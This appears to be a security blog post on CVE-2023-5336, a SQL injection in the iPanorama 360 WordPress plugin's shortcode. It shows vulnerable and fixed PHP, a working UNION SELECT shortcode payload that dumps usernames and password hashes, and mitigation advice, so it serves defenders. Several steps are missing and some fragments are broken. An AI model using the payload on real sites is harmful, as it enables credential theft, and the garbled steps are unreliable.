CVE-2023-5336 - How iPanorama 360 WordPress Plugin’s Shortcode Puts Your Data at Risk (With Exploit Guide)

Published: 2024-06-XX
Author: SecurityExpertAI

The popular iPanorama 360 – WordPress Virtual Tour Builder plugin lets webmasters create immersive experiences—but recently, researchers uncovered a dangerous vulnerability: CVE-2023-5336, a SQL Injection bug that could give attackers access to sensitive site data. In this deep dive, we explain how the vulnerability works, demonstrate example exploitation, and provide mitigation steps.

What is CVE-2023-5336?

CVE-2023-5336 refers to a SQL Injection vulnerability present in iPanorama 360 versions up to, and including, 1.8.. The flaw exists in the plugin’s shortcode handler, which fails to safely escape user inputs before using them in SQL statements. Authenticated users (even those with Contributor access) can inject arbitrary SQL through the shortcode—letting them read sensitive information from the WordPress site’s database.

Official References

- Wordfence Advisory
- WPScan Vulnerability Report - CVE-2023-5336
- NVD - CVE-2023-5336

The id parameter is unescaped and unsanitized when incorporated into an SQL query.

3. An attacker logged in as a Contributor, Author, Editor, or Administrator can supply crafted input to leak or manipulate database info.

Key Point: Attackers can only exploit this if logged in—but every Contributor you allow could be a potential threat.

Here’s a simplified version of the problematic code

function get_panorama($atts) {
    global $wpdb;
    $id = $atts['id'];
    $result = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}ipanorama_items WHERE id = $id");
    return $result;
}

Problem: The $id value is taken straight from user input and dropped into the SQL query.

A secure alternative would use $wpdb->prepare() to prevent injection

$result = $wpdb->get_row($wpdb->prepare("SELECT * FROM {$wpdb->prefix}ipanorama_items WHERE id = %d", $id));

Example Exploit

Suppose an attacker has Contributor access. Here’s a sample payload to dump WordPress user table hashes:

[ipanorama id=" UNION SELECT 1, user_login, user_pass, 4, 5 FROM wp_users-- -"]

If the plugin's code is vulnerable, the query becomes

SELECT * FROM wp_ipanorama_items WHERE id =  UNION SELECT 1, user_login, user_pass, 4, 5 FROM wp_users-- -

This causes the site to output WordPress usernames and hashed passwords instead of panorama data.

`

3. Publish/preview the post. If the plugin is vulnerable, the web page will output usernames and password hashes from the database.

Any other info stored in accessible DB tables

With the password hashes, attackers can attempt offline brute-force attacks for admin access.

1. Update the Plugin

The vendor patched this in later versions. Upgrade to the latest release immediately.

2. Limit Contributor Access

Reduce the number of Contributor or higher user accounts, and regularly review user privileges.

3. Web Application Firewall

Enable WAF solution (like Wordfence) to block SQLi payloads.

Checking for Exploitation

- Review your posts/pages for suspicious iPanorama shortcodes.

Conclusion

CVE-2023-5336 highlights the importance of proper input validation in WordPress plugins. Even trusted contributors can become threats if a single vulnerable plugin is present.

Timeline

Published on: 10/19/2023 02:15:07 UTC
Last modified on: 11/07/2023 04:23:55 UTC